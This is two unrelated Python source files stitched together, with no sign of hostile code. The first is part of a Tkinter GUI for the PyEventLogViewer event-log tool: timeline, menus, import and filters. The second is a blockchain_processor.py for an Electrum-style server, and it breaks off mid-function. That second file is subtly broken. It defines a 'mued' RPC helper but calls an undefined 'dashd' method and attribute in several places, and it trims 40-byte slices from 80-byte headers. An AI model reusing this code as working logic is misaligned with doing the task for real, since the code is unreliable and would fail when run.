if self.current_project.exception is not None:
self.current_project = None
return
self.winfo_toplevel().title(f'PyEventLogViewer - {self.current_project.get_path().split(os.path.sep)[-1]}')
# Update the UI selected timezone to match the one in the project config
self.menu_bar.timezone_offset.set(self.current_project.config['state']['timezone_offset'])
self.create_new_timeline()
self.__enable__()
def close_project(self):
"""
Prompts the user to save the project and then closes it.
:return:
"""
if self.current_project is not None and self.changes_made:
answer = messagebox.askquestion(title='Save Before Close',
message='Would you like to save the currently opened project before '
'closing it?', type=messagebox.YESNOCANCEL)
if answer == messagebox.YES:
self.changes_made = False
self.current_project.close()
elif answer == messagebox.NO:
pass
else:
return
self.current_project = None
self.winfo_toplevel().title('PyEventLogViewer')
if self.timeline is not None:
self.timeline.pack_forget()
self.timeline = None
@enable_disable_wrapper(lambda *args: args[0])
def import_function(self, file_name, alias):
"""
Function used to kick off the log import process.
:param file_name: The path to the file to import.
:param alias: A unique alias for the file.
:return:
"""
self.__disable__()
def callback():
nonlocal self, file_name, alias
# Prepare status bar callback.
text = '{file}: {status}'.format(file=os.path.basename(file_name), status='{status}')
# Start the import log process.
try:
collector.import_log(file_name, alias, self.current_project, '',
lambda s: self.update_status_bar(text.format(status=s)),
self.get_progress_bar_context_manager)
except IntegrityError:
self.update_status_bar(f'Error while importing log: {file_name} has already been imported')
self.current_project.cleanup_import(alias)
self.__enable__()
return
except Exception as e:
self.update_status_bar(f'Error while importing log: {e.__class__.__name__}: {str(e)}')
self.current_project.cleanup_import(alias)
self.__enable__()
return
# Create or update the timeline.
self.create_new_timeline()
self.changes_made = True
t = Thread(target=callback)
t.start()
return
def get_filtered_records(self):
"""
Returns a list of records with the filter applied. Meant for use in the export process.
:return:
"""
return self.current_project.filter_logs(IntVar(0)) # This should be dedup_var from Filters
def create_new_timeline(self, headers=None, records=None):
"""
Function for creating/updating the event section.
:param headers: A tuple containing the column titles. These should be in the same order as the values in
records.
:param records: A list of tuples containing the record values.
:return:
"""
def callback():
nonlocal self, headers, records
# Disable all timeline interaction buttons to prevent a timeline duplication bug
self.__disable__()
self.update_status_bar('Loading records...')
# Get all records if they weren't provided
if records is None:
records = self.filter_section.apply_filter()
if len(records) == 0:
self.__enable__()
self.update_status_bar('No records to display. ')
return
if headers is None:
headers = Record.get_headers()
records = [record.get_tuple() for record in records]
# Delete the old timeline if it exists
if self.timeline is not None:
self.timeline.pack_forget()
self.update_status_bar('Rendering timeline...')
# Create the new timeline
self.timeline = Timeline(self, headers, records)
self.update_status_bar('')
# Enable all timeline interaction buttons
self.__enable__()
t = Thread(target=callback)
t.start()
def create_startup_window(self):
"""
Helper function that checks the config.json file and decides whether or not to display the startup window.
:return:
"""
startup_window = self.program_config.get("startup_window", None)
# Check to see if the config.json file has a startup_window key.
if startup_window is None:
# self.program_config.update({"startup_window": True})
self.program_config["startup_window"] = True
startup_window = True
util.data.write_config(self.program_config)
if startup_window:
window = StartupWindow(self)
window.attributes('-topmost', True)
def __disable__(self):
self.enabled = False
if self.system != 'Darwin':
self.toolbar.__disable__()
# self.query_bar.__disable__()
# self.filter_section.__disable__()
self.menu_bar.__disable__()
def __enable__(self):
self.enabled = True
if self.system != 'Darwin':
self.toolbar.__enable__()
# self.query_bar.__enable__()
# self.filter_section.__enable__()
self.menu_bar.__enable__()
def __destroy__(self):
self.close_project()
self.destroy()
class Timeline(Frame):
def __init__(self, parent, headers, data, **kwargs):
super().__init__(parent, **kwargs)
# Class variables
self.headers = headers
self.col_width = {header: font.Font().measure(header) for header in headers}
# Create and place the widgets
self._init_widgets()
self.setup_columns()
self.update_column_widths(data)
self.update_tags(parent.current_project.config['events']['colors'])
self.populate_timeline(data)
self.sort_column('Timestamp', False)
self._place_widgets()
def _init_widgets(self):
# Treeview
self.tree = Treeview(columns=self.headers, show='headings')
# Scrollbars
self.vsb = Scrollbar(orient='vertical', command=self.tree.yview)
self.hsb = Scrollbar(orient='horizontal', command=self.tree.xview)
self.tree.configure(yscrollcommand=self.vsb.set, xscrollcommand=self.hsb.set)
# Set all columns to be enabled by default
self.tree['displaycolumns'] = self.master.current_project.config['state']['columns']
# Add a context menu on right click for enabling and disabling columns
if self.master.system.lower() == "darwin":
self.tree.bind('<Button-2>', self.master.menu_bar.header_popup) # macOS or Unix
else:
self.tree.bind('<Button-3>', self.master.menu_bar.header_popup) # Windows
self.tree.bind("<Double-1>", self.double_click)
def _place_widgets(self):
# Tree
self.tree.grid(column=0, row=0, sticky='nsew', in_=self)
# Scrollbars
self.vsb.grid(column=1, row=0, sticky='ns', in_=self)
self.hsb.grid(column=0, row=1, sticky='ew', in_=self)
self.grid_columnconfigure(0, weight=1)
self.grid_rowconfigure(0, weight=1)
self.pack(fill=BOTH, expand=True)
def update_tags(self, tags):
"""
Updates the colors associated with record tags.
:param tags: The tags to update.
:return:
"""
for source, events in tags.items():
for event, color in events.items():
self.tree.tag_configure(f'{source}::{event}', background=color)
def setup_columns(self):
"""
Inserts headers into the timeline.
:return:
"""
# Set up the columns
for col in self.headers:
self.tree.heading(col, text=col.title(), command=lambda _col=col: self.sort_column(_col, False))
def populate_timeline(self, data):
"""
Populates the timeline.
:param data: The data to insert into the timeline.
:return:
"""
# Insert the data
self.master.update_status_bar('Populating timeline...')
with self.master.get_progress_bar_context_manager(len(data)) as progress_bar:
for i, row in enumerate(data):
self.tree.insert('', 'end', values=row, tags=f'{row[4]}::{row[1]}')
if not i % 100:
progress_bar.update_progress(100)
self.master.update_status_bar('Finished populating timeline.')
def update_column_widths(self, data):
"""
Calculates the widths for the columns.
:param data: The data to iterate over.
:return:
"""
known_s_widths = dict()
known_widths = dict()
excluded_headers = {'Details', }
measurement_font = font.Font()
# Determine the column widths
self.master.update_status_bar("Calculating the column widths...")
with self.master.get_progress_bar_context_manager(len(data)) as progress_bar:
for j, row in enumerate(data):
# Update the column widths
for i, v in enumerate(row):
if self.headers[i] in excluded_headers:
continue
if type(v) is str:
if len(v) not in known_s_widths:
known_s_widths[len(v)] = measurement_font.measure(v)
width = known_s_widths[len(v)]
else:
if v not in known_widths:
known_widths[v] = measurement_font.measure(v)
width = known_widths[v]
if width > self.col_width[self.headers[i]]:
self.col_width[self.headers[i]] = width
# Update the progress bar
if not j % 100:
progress_bar.update_progress(100)
self.master.update_status_bar('Finished calculating column widths.')
# Updating the column widths
for col in self.headers:
self.tree.column(col, width=self.col_width[col])
def sort_column(self, col, reverse):
"""
Sorts the timeline based on a particular column.
:param col: The column to sort.
:param reverse: Whether or not to sort in reverse order.
:return:
"""
column_elements = [(self.tree.set(k, col), k) for k in self.tree.get_children('')]
if col == 'Event ID' or col == 'Record Number':
column_elements = [(int(v), k) for v, k in column_elements]
column_elements.sort(reverse=reverse)
for index, (val, k) in enumerate(column_elements):
self.tree.move(k, '', index)
self.tree.heading(col, command=lambda _col=col: self.sort_column(_col, not reverse))
def double_click(self, event):
item = self.tree.selection()[0]
event = self.tree.item(item, "values")
# Query for all of the records that have the specific record hash
query = "SELECT * FROM raw_xml_data WHERE record_hash = ?"
cur = self.master.current_project._conn.execute(query, (event[-2],))
record = cur.fetchall()[0]
if self.master.expanded_view is None: # or self.master.side_bar == .!sidebar:
self.master.expanded_view = ExpandedView(self.master)
self.master.expanded_view.update_view(record[1])
class StatusBar(Frame):
def __init__(self, parent):
super().__init__(parent, relief=SUNKEN)
self.progress = None
self._init_widgets()
self._place_widgets()
def _init_widgets(self):
self.status = Label(self, text='Notice: Create a new project or open an existing project to get started.',
anchor=W)
def _place_widgets(self):
padding = 2
self.status.grid(row=0, column=0, padx=padding, pady=padding + 2, sticky='W')
# self.progress.grid(row=0, column=1, padx=padding, pady=padding, sticky='E')
self.columnconfigure(0, weight=4)
self.pack(side=BOTTOM, fill=X)
def update_status(self, message):
"""
Updates the message displayed on the status bar.
:param message: The message to display.
:return:
"""
self.status.config(text=message)
class StatusBarContextManager:
def __init__(self, parent, max_value):
self.parent = parent
self.max_value = max_value
def __enter__(self):
self.parent.progress = Progressbar(self.parent, length=200, maximum=self.max_value, mode='determinate')
self.parent.progress.grid(row=0, column=1, padx=2, pady=2, sticky='E')
return self
def __exit__(self, *args):
self.parent.progress.grid_forget()
def update_progress(self, steps):
"""
Increments the progress bar.
:param steps: The number of steps to increment the progress bar by.
:return:
"""
self.parent.progress.step(steps)
class Toolbar(Frame):
def __init__(self, parent, *args, **kwargs):
super().__init__(parent, borderwidth=1, relief=SUNKEN, **kwargs)
self.import_photo = PhotoImage(file=util.data.get_package_data_path(__file__, 'icons', 'import.gif'))
self.export_photo = PhotoImage(file=util.data.get_package_data_path(__file__, 'icons', 'export.gif'))
self.import_button = Button(self, image=self.import_photo, width='20',
command=self.master.menu_bar.import_button_function)
self.export_button = Button(self, image=self.export_photo, width='20',
command=self.master.menu_bar.export_button_function)
self.import_button.pack()
self.export_button.pack()
self.pack(side=LEFT, fill=Y)
def __disable__(self):
self.import_button.config(state=DISABLED)
self.export_button.config(state=DISABLED)
def __enable__(self):
self.import_button.config(state=NORMAL)
self.export_button.config(state=NORMAL)
class MenuBar(Menu):
def __init__(self, parent, **kwargs):
super().__init__(parent, **kwargs)
parent.config(menu=self)
# File
self.file_menu = Menu(self, **kwargs)
self.add_cascade(label='File', menu=self.file_menu, underline=0)
# File -> New Project (Ctrl+N)
self.file_menu.add_command(label='New', command=self.new_project_function, underline=0,
accelerator='Ctrl+N')
parent.bind('<Control-n>', self.new_project_function)
# File -> Open... (Ctrl+O)
self.file_menu.add_command(label='Open...', command=self.open_project_function, underline=0,
accelerator='Ctrl+O')
parent.bind('<Control-o>', self.open_project_function)
# File -> Save
self.file_menu.add_command(label='Save', command=self.save_project_function, underline=0,
accelerator='Ctrl+S')
parent.bind('<Control-s>', self.save_project_function)
# File -> Export
self.file_menu.add_command(label="Export Timeline", command=self.export_button_function, underline=0,
accelerator='Ctrl+E')
parent.bind('<Control-e>', self.export_button_function)
# View
self.view_menu = Menu(self, **kwargs)
self.add_cascade(label='View', menu=self.view_menu, underline=0)
# View -> Timeline Headers
self.timeline_header_menu = None
self.header_vars = dict()
self.header_pairs = list()
underlines = set()
# Individual headers and associated variables/callbacks
for h in Record.get_headers():
# Initialize the variable indicating whether or not the column is enabled
self.header_vars[h] = BooleanVar()
# Determine which character to underline for shortcuts
i = 0
while h[i] in underlines:
i += 1
underlines.add(h[i])
self.header_pairs.append((h, i))
# Default value and callback function
self.header_vars[h].set(True)
self.header_vars[h].trace('w', self.update_column_function)
self.build_timeline_header_menu(type="dropdown", **kwargs)
# View -> Timezone
self.timezone_menu = Menu(self, **kwargs)
self.view_menu.add_cascade(label='Timezone', menu=self.timezone_menu, underline=5)
self.timezone_offset = IntVar()
self.timezone_offset.set(0)
cities = ['United States Minor Outlying Islands',
'American Samoa',
'Honolulu',
'Anchorage',
'Los Angeles/Vancouver',
'Phoenix/Calgary',
'Chicago/Mexico City',
'New York/Havana',
'Caracas/Halifax',
'Buenos Aires/São Paulo',
'Brazil',
'Cape Verde',
'Dublin/London',
'Berlin/Paris/Rome',
'Bucharest/Jerusalem',
'Istanbul/Baghdad',
'Dubai',
'Karachi/Tashkent',
'Almaty/Dhaka',
'Jakarta/Bangkok',
'Beijing/Taipei',
'Seoul/Tokyo',
'Sydney',
'Noumea',
'Auckland',
'Apia',
'Kiribati']
for offset in range(-12, 13):
self.timezone_menu.add_radiobutton(label=f'UTC{offset:+d} - {cities[offset + 12]}',
# if offset != 0 else 'UTC',
variable=self.timezone_offset, value=offset,
command=self.update_timezone_offset)
# Tools
self.tool_menu = Menu(self, **kwargs)
self.add_cascade(label='Tools', menu=self.tool_menu, underline=0)
# Tools -> Record Highlighting
self.tool_menu.add_command(label='Record Highlighting', command=self.color_settings_function, underline=0)
# Tools -> Configure Log Collection
self.tool_menu.add_command(label='Configure Log Collection', command=self.colleciton_settings_function,
underline=1)
# Tools -> Import Log
self.tool_menu.add_command(label='Import Log File', command=self.import_button_function, underline=0,
accelerator='Ctrl+I')
parent.bind('<Control-i>', self.import_button_function)
# Help
self.help_menu = Menu(self, **kwargs)
self.add_cascade(label='Help', menu=self.help_menu, underline=0)
# Help -> About
self.help_menu.add_command(label='About', command=self.about_function, underline=0)
# Help -> License
self.help_menu.add_command(label='License', command=self.license_function, underline=0)
# Help -> Contact
self.help_menu.add_command(label='Contact', command=self.contact_function, underline=0)
def new_project_function(self, event=None):
"""
Callback function for File -> New. Closes the current project and kicks of the project creation wizard.
:param event: A click or key press event.
:return:
"""
self.master.close_project()
self.master.create_project()
if self.master.current_project is not None:
self.master.update_status_bar('Project created at ' + self.master.current_project.get_path())
else:
self.master.__disable__()
def open_project_function(self, event=None):
"""
Callback function for File -> Open. Closes the current project and kicks off the open project UI.
:param event: A click or key press event.
:return:
"""
projects_path = os.path.join(util.data.get_appdir(), 'Projects')
filename = filedialog.askopenfilename(initialdir=projects_path, title='Open a Project File',
filetypes=(('ELV Project File', '*.elv'),))
if len(filename) > 0:
self.master.close_project()
self.master.open_project(filename)
if self.master.current_project is not None:
self.master.update_status_bar('Project opened at ' + self.master.current_project.get_path())
else:
self.master.update_status_bar('Failed to open the project at ' + filename)
return
# Load the enabled and disabled columns
for col in self.header_vars.keys():
self.header_vars[col].set(col in self.master.current_project.config['state']['columns'])
self.master.changes_made = False
@enable_disable_wrapper(lambda *args: args[0].master)
def save_project_function(self, event=None):
"""
Callback function for File -> Save. Saves the current project.
:param event: A click or key press event.
:return:
"""
if self.master.current_project is None:
return
self.master.current_project.save()
self.master.update_status_bar('Project saved')
self.master.changes_made = False
@enable_disable_wrapper(lambda *args: args[0].master)
def color_settings_function(self, event=None):
"""
Callback function for Tools -> Record Highlighting. Alters the colors for the current project.
:param event: A click or key press event.
:return:
"""
self.master.open_color_settings()
@enable_disable_wrapper(lambda *args: args[0].master)
def colleciton_settings_function(self, event=None):
"""
Callback function for Tools -> Configure Log Collection. Alters the records being scraped for the current project.
:param event: A click or key press event.
:return:
"""
self.master.open_collection_settings()
@enable_disable_wrapper(lambda *args: args[0].master)
def import_button_function(self, event=None):
"""
Callback function for Tools -> Import Log File. Launches the log file import window.
:return:
"""
wizard = ImportWindow(self)
wizard.grab_set()
@enable_disable_wrapper(lambda *args: args[0].master)
def export_button_function(self, event=None):
"""
Callback function for File -> Export Timeline. Launches the export window.
:return:
"""
wizard = ExportWindow(self, self.master.current_project)
wizard.grab_set()
@enable_disable_wrapper(lambda *args: args[0].master)
def filter_function(self, event=None):
"""
:param event:
:return:
"""
wizard = FilterWindow(self, self.master.current_project)
wizard.grab_set()
@enable_disable_wrapper(lambda *args: args[0].master)
def update_column_function(self, *args, event=None):
"""
Used to enable and disable timeline columns.
:return:
"""
columns = tuple(col for col in Record.get_headers() if self.header_vars[col].get())
if self.master.current_project is not None:
self.master.current_project.config['state']['columns'] = columns
self.master.changes_made = True
if self.master.timeline is None:
return
self.master.timeline.tree['displaycolumns'] = columns
@enable_disable_wrapper(lambda *args: args[0].master)
def update_timezone_offset(self, event=None):
"""
Changes the timezone offset and refreshes the timeline. Also marks the project as changed so that the user is
prompted to save before closing.
:return:
"""
if self.master.current_project is not None:
self.master.current_project.config['state']['timezone_offset'] = self.timezone_offset.get()
self.master.create_new_timeline()
self.master.changes_made = True
def enable_all_columns_function(self, event=None):
"""
Enables all columns.
:return:
"""
for h, v in self.header_vars.items():
if not v.get():
v.set(True)
def build_timeline_header_menu(self, type="dropdown", event=None, **kwargs):
self.timeline_header_menu = Menu(self, **kwargs)
if type == "dropdown":
self.view_menu.add_cascade(label='Timeline Headers', menu=self.timeline_header_menu, underline=0)
self.timeline_header_menu.add_command(label='Enable All', command=self.enable_all_columns_function, underline=8)
self.timeline_header_menu.add_separator()
# Individual headers and associated variables/callbacks
for pair in self.header_pairs:
# Add a checkbutton per pair
self.timeline_header_menu.add_checkbutton(label=pair[0], onvalue=True, offvalue=False,
variable=self.header_vars[pair[0]], underline=pair[1])
if type != "dropdown":
self.timeline_header_menu.tk_popup(event.x_root, event.y_root)
def header_popup(self, event=None):
"""
Event callback used when the user right clicks on the timeline. Should bring up the header enable/disable menu.
:return:
"""
try:
self.build_timeline_header_menu("popup", event)
finally:
self.timeline_header_menu.grab_release()
def about_function(self, event=None):
"""
:param event:
:return:
"""
wizard = HelpWindow(self, "about")
wizard.grab_set()
def license_function(self, event=None):
"""
:param event:
:return:
"""
wizard = HelpWindow(self, "license")
wizard.grab_set()
def contact_function(self, event=None):
"""
:param event:
:return:
"""
wizard = HelpWindow(self, "contact")
wizard.grab_set()
def __enable__(self):
self.entryconfig('Tools', state=NORMAL)
self.entryconfig('View', state=NORMAL)
self.file_menu.entryconfig('Save', state=NORMAL)
self.file_menu.entryconfig('Export Timeline', state=NORMAL)
def __disable__(self):
self.entryconfig('Tools', state=DISABLED)
self.entryconfig('View', state=DISABLED)
self.file_menu.entryconfig('Save', state=DISABLED)
self.file_menu.entryconfig('Export Timeline', state=DISABLED)
class Filters(Frame):
def __init__(self, parent, **kwargs):
super().__init__(parent, **kwargs)
self.pack(side=TOP, fill=X)
self.advanced = Button(self, text="Filters", command=lambda: self.advanced_filter_function())
self.advanced.pack(side=LEFT)
self.clear = Button(self, text="Clear", command=lambda: self.clear_timeline())
self.clear.pack(side=LEFT)
self.dedup_var = IntVar(value=0)
self.dedup = Checkbutton(self, text="Deduplicate", variable=self.dedup_var)
self.dedup.pack(side=LEFT)
# self.dedup_var.trace('w', self.apply_filter())
def create_column_list(self, colList):
tmp = Record.get_headers()
for col in tmp:
colList.append(col)
def apply_filter(self):
if 'filters' in self.master.current_project.config:
return self.master.current_project.filter_logs(self.dedup_var)
else:
return self.master.current_project.get_all_logs()
@enable_disable_wrapper(lambda *args: args[0].master)
def clear_timeline(self):
self.master.changes_made = True
self.master.current_project.config['filters'] = [f[:3] + [0] for f in
self.master.current_project.config.get('filters', [])]
self.master.create_new_timeline()
@enable_disable_wrapper(lambda *args: args[0].master)
def advanced_filter_function(self, event=None):
"""
:param event:
:return:
"""
wizard = FilterWindow(self, self.master.current_project)
wizard.grab_set()
|
blockchain_processor.py
|
#!/usr/bin/env python
# Copyright(C) 2011-2016 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import hashlib
from json import dumps, load
import os
from Queue import Queue
import random
import sys
import time
import threading
import urllib
import deserialize
from processor import Processor, print_log
from storage import Storage
from utils import logger, hash_decode, hash_encode, HashX11, Hash, header_from_string, header_to_string, ProfiledThread, \
rev_hex, int_to_hex4
class BlockchainProcessor(Processor):
def __init__(self, config, shared):
Processor.__init__(self)
# monitoring
self.avg_time = 0,0,0
self.time_ref = time.time()
self.shared = shared
self.config = config
self.up_to_date = False
self.watch_lock = threading.Lock()
self.watch_blocks = []
self.watch_headers = []
self.watched_addresses = {}
self.history_cache = {}
self.merkle_cache = {}
self.max_cache_size = 100000
self.chunk_cache = {}
self.cache_lock = threading.Lock()
self.headers_data = ''
self.headers_path = config.get('leveldb', 'path')
self.mempool_fees = {}
self.mempool_values = {}
self.mempool_addresses = {}
self.mempool_hist = {} # addr -> (txid, delta)
self.mempool_unconfirmed = {} # txid -> set of unconfirmed inputs
self.mempool_hashes = set()
self.mempool_lock = threading.Lock()
self.address_queue = Queue()
try:
self.test_reorgs = config.getboolean('leveldb', 'test_reorgs') # simulate random blockchain reorgs
except:
self.test_reorgs = False
self.storage = Storage(config, shared, self.test_reorgs)
self.mued_url = 'http://%s:%s@%s:%s/' % (
config.get('mued', 'mued_user'),
config.get('mued', 'mued_password'),
config.get('mued', 'mued_host'),
config.get('mued', 'mued_port'))
self.sent_height = 0
self.sent_header = None
# catch_up headers
self.init_headers(self.storage.height)
# start catch_up thread
if config.getboolean('leveldb', 'profiler'):
filename = os.path.join(config.get('leveldb', 'path'), 'profile')
print_log('profiled thread', filename)
self.blockchain_thread = ProfiledThread(filename, target = self.do_catch_up)
else:
self.blockchain_thread = threading.Thread(target = self.do_catch_up)
self.blockchain_thread.start()
def do_catch_up(self):
self.header = self.block2header(self.mued('getblock', (self.storage.last_hash,)))
self.header['utxo_root'] = self.storage.get_root_hash().encode('hex')
self.catch_up(sync=False)
if not self.shared.stopped():
print_log("Blockchain is up to date.")
self.memorypool_update()
print_log("Memory pool initialized.")
while not self.shared.stopped():
self.main_iteration()
if self.shared.paused():
print_log("mued is responding")
self.shared.unpause()
time.sleep(10)
def set_time(self):
self.time_ref = time.time()
def print_time(self, num_tx):
delta = time.time() - self.time_ref
# leaky averages
seconds_per_block, tx_per_second, n = self.avg_time
alpha = (1. + 0.01 * n)/(n+1)
seconds_per_block = (1-alpha) * seconds_per_block + alpha * delta
alpha2 = alpha * delta / seconds_per_block
tx_per_second = (1-alpha2) * tx_per_second + alpha2 * num_tx / delta
self.avg_time = seconds_per_block, tx_per_second, n+1
if self.storage.height%100 == 0 \
or (self.storage.height%10 == 0 and self.storage.height >= 100000)\
or self.storage.height >= 200000:
msg = "block %d (%d %.2fs) %s" %(self.storage.height, num_tx, delta, self.storage.get_root_hash().encode('hex'))
msg += " (%.2ftx/s, %.2fs/block)" % (tx_per_second, seconds_per_block)
run_blocks = self.storage.height - self.start_catchup_height
remaining_blocks = self.mued_height - self.storage.height
if run_blocks>0 and remaining_blocks>0:
remaining_minutes = remaining_blocks * seconds_per_block / 60
new_blocks = int(remaining_minutes / 10) # number of new blocks expected during catchup
blocks_to_process = remaining_blocks + new_blocks
minutes = blocks_to_process * seconds_per_block / 60
rt = "%.0fmin"%minutes if minutes < 300 else "%.1f hours"%(minutes/60)
msg += " (eta %s, %d blocks)" % (rt, remaining_blocks)
print_log(msg)
def wait_on_mued(self):
self.shared.pause()
time.sleep(10)
if self.shared.stopped():
# this will end the thread
raise BaseException()
def mued(self, method, params=()):
postdata = dumps({"method": method, 'params': params, 'id': 'jsonrpc'})
while True:
try:
response = urllib.urlopen(self.mued_url, postdata)
r = load(response)
response.close()
except:
print_log("cannot reach mued...")
self.wait_on_mued()
else:
if r['error'] is not None:
if r['error'].get('code') == -28:
print_log("mued still warming up...")
self.wait_on_mued()
continue
raise BaseException(r['error'])
break
return r.get('result')
@staticmethod
def block2header(b):
return {
"block_height": b.get('height'),
"version": b.get('version'),
"prev_block_hash": b.get('previousblockhash'),
"merkle_root": b.get('merkleroot'),
"timestamp": b.get('time'),
"bits": int(b.get('bits'), 16),
"nonce": b.get('nonce'),
}
def get_header(self, height):
block_hash = self.dashd('getblockhash', (height,))
b = self.dashd('getblock', (block_hash,))
return self.block2header(b)
def init_headers(self, db_height):
self.headers_filename = os.path.join(self.headers_path, 'blockchain_headers')
if os.path.exists(self.headers_filename):
height = os.path.getsize(self.headers_filename)/80 - 1 # the current height
if height > 0:
prev_hash = self.hash_header(self.read_header(height))
else:
prev_hash = None
else:
open(self.headers_filename, 'wb').close()
prev_hash = None
height = -1
if height < db_height:
print_log("catching up missing headers:", height, db_height)
try:
while height < db_height:
height += 1
header = self.get_header(height)
if height > 1:
if prev_hash != header.get('prev_block_hash'):
# The prev_hash block is orphaned, go back
print_log("reorganizing, a block in file is orphaned:", prev_hash)
# Go to the parent of the orphaned block
height -= 2
prev_hash = self.hash_header(self.read_header(height))
continue
self.write_header(header, sync=False)
prev_hash = self.hash_header(header)
if (height % 1000) == 0:
print_log("headers file:", height)
except KeyboardInterrupt:
self.flush_headers()
sys.exit()
self.flush_headers()
@staticmethod
def hash_header(header):
return rev_hex(HashX11(header_to_string(header).decode('hex')).encode('hex'))
def read_header(self, block_height):
if os.path.exists(self.headers_filename):
with open(self.headers_filename, 'rb') as f:
f.seek(block_height * 80)
h = f.read(80)
if len(h) == 80:
h = header_from_string(h)
return h
def read_chunk(self, index):
with open(self.headers_filename, 'rb') as f:
f.seek(index*2016*80)
chunk = f.read(2016*80)
return chunk.encode('hex')
def write_header(self, header, sync=True):
if not self.headers_data:
self.headers_offset = header.get('block_height')
self.headers_data += header_to_string(header).decode('hex')
if sync or len(self.headers_data) > 40*100:
self.flush_headers()
with self.cache_lock:
chunk_index = header.get('block_height')/2016
if chunk_index in self.chunk_cache:
del self.chunk_cache[chunk_index]
def pop_header(self):
# we need to do this only if we have not flushed
if self.headers_data:
self.headers_data = self.headers_data[:-40]
def flush_headers(self):
if not self.headers_data:
return
with open(self.headers_filename, 'rb+') as f:
f.seek(self.headers_offset*80)
f.write(self.headers_data)
self.headers_data = ''
def get_chunk(self, i):
# store them on disk; store the current chunk in memory
with self.cache_lock:
chunk = self.chunk_cache.get(i)
if not chunk:
chunk = self.read_chunk(i)
if chunk:
self.chunk_cache[i] = chunk
return chunk
def get_mempool_transaction(self, txid):
try:
raw_tx = self.dashd('getrawtransaction', (txid, 0))
except:
return None
vds = deserialize.BCDataStream()
vds.write(raw_tx.decode('hex'))
try:
return deserialize.parse_Transaction(vds, is_coinbase=False)
except:
print_log("ERROR: cannot parse", txid)
return None
def get_unconfirmed_history(self, addr):
hist = []
with self.mempool_lock:
for tx_hash, delta in self.mempool_hist.get(addr, ()):
height = -1 if self.mempool_unconfirmed.get(tx_hash) else 0
fee = self.mempool_fees.get(tx_hash)
hist.append({'tx_hash':tx_hash, 'height':height, 'fee':fee})
return hist
def get_history(self, addr, cache_only=False):
with self.cache_lock:
hist = self.history_cache.get(addr)
if hist is not None:
return hist
if cache_only:
return -1
hist = self.storage.get_history(addr)
hist.extend(self.get_unconfirmed_history(addr))
with self.cache_lock:
if len(self.history_cache) > self.max_cache_size:
logger.info("clearing cache")
self.history_cache.clear()
self.history_cache[addr] = hist
return hist
def get_unconfirmed_value(self, addr):
v = 0
with self.mempool_lock:
for txid, delta in self.mempool_hist.get(addr, ()):
v += delta
return v
def get_status(self, addr, cache_only=False):
tx_points = self.get_history(addr, cache_only)
if cache_only and tx_points == -1:
return -1
if not tx_points:
return None
if tx_points == ['*']:
return '*'
status = ''.join(tx.get('tx_hash') + ':%d:' % tx.get('height') for tx in tx_points)
return hashlib.sha256(status).digest().encode('hex')
def get_merkle(self, tx_hash, height, cache_only):
with self.cache_lock:
out = self.merkle_cache.get(tx_hash)
if out is not None:
return out
if cache_only:
return -1
block_hash = self.dashd('getblockhash', (height,))
b = self.dashd('getblock', (block_hash,))
tx_list = b.get('tx')
tx_pos = tx_list.index(tx_hash)
merkle = map(hash_decode, tx_list)
target_hash = hash_decode(tx_hash)
s = []
while len(merkle) != 1:
if len(merkle) % 2:
merkle.append(merkle[-1])
n = []
while merkle:
new_hash = Hash(merkle[0] + merkle[1])
if merkle[0] == target_hash:
s.append(hash_encode(merkle[1]))
target_hash = new_hash
elif merkle[1] == target_hash:
s.append(hash_encode(merkle[0]))
target_hash = new_hash
n.append(new_hash)
merkle = merkle[2:]
merkle = n
out = {"block_height": height, "merkle": s, "pos": tx_pos}
with self.cache_lock:
if len(self.merkle_cache) > self.max_cache_size:
logger.info("clearing merkle cache")
self.merkle_cache.clear()
self.merkle_cache[tx_hash] = out
return out
@staticmethod
def deserialize_block(block):
txlist = block.get('tx')
tx_hashes = [] # ordered txids
txdict = {} # deserialized tx
is_coinbase = True
for raw_tx in txlist:
tx_hash = hash_encode(Hash(raw_tx.decode('hex')))
vds = deserialize.BCDataStream()
vds.write(raw_tx.decode('hex'))
try:
tx = deserialize.parse_Transaction(vds, is_coinbase)
except:
print_log("ERROR: cannot parse", tx_hash)
continue
tx_hashes.append(tx_hash)
txdict[tx_hash] = tx
is_coinbase = False
return tx_hashes, txdict
def import_block(self, block, block_hash, block_height, revert=False):
touched_addr = set()
# deserialize transactions
tx_hashes, txdict = self.deserialize_block(block)
# undo info
if revert:
undo_info = self.storage.get_undo_info(block_height)
tx_hashes.reverse()
else:
undo_info = {}
for txid in tx_hashes: # must be ordered
tx = txdict[txid]
if not revert:
undo = self.storage.import_transaction(txid, tx, block_height, touched_addr)
undo_info[txid] = undo
else:
undo = undo_info.pop(txid)
self.storage.revert_transaction(txid, tx, block_height, touched_addr, undo)
if revert:
assert undo_info == {}
# add undo info
if not revert:
self.storage.write_undo_info(block_height, self.dashd_height, undo_info)
# add the max
self.storage.save_height(block_hash, block_height)
for addr in touched_addr:
self.invalidate_cache(addr)
self.storage.update_hashes()
# batch write modified nodes
self.storage.batch_write()
# return length for monitoring
return len(tx_hashes)
def add_request(self, session, request):
# see if we can get if from cache. if not, add request to queue
message_id = request.get('id')
try:
result = self.process(request, cache_only=True)
except BaseException as e:
self.push_response(session, {'id': message_id, 'error': str(e)})
return
if result == -1:
self.queue.put((session, request))
else:
self.push_response(session, {'id': message_id, 'result': result})
def do_subscribe(self, method, params, session):
with self.watch_lock:
if method == 'blockchain.numblocks.subscribe':
if session not in self.watch_blocks:
self.watch_blocks.append(session)
elif method == 'blockchain.headers.subscribe':
if session not in self.watch_headers:
self.watch_headers.append(session)
elif method == 'blockchain.address.subscribe':
address = params[0]
l = self.watched_addresses.get(address)
if l is None:
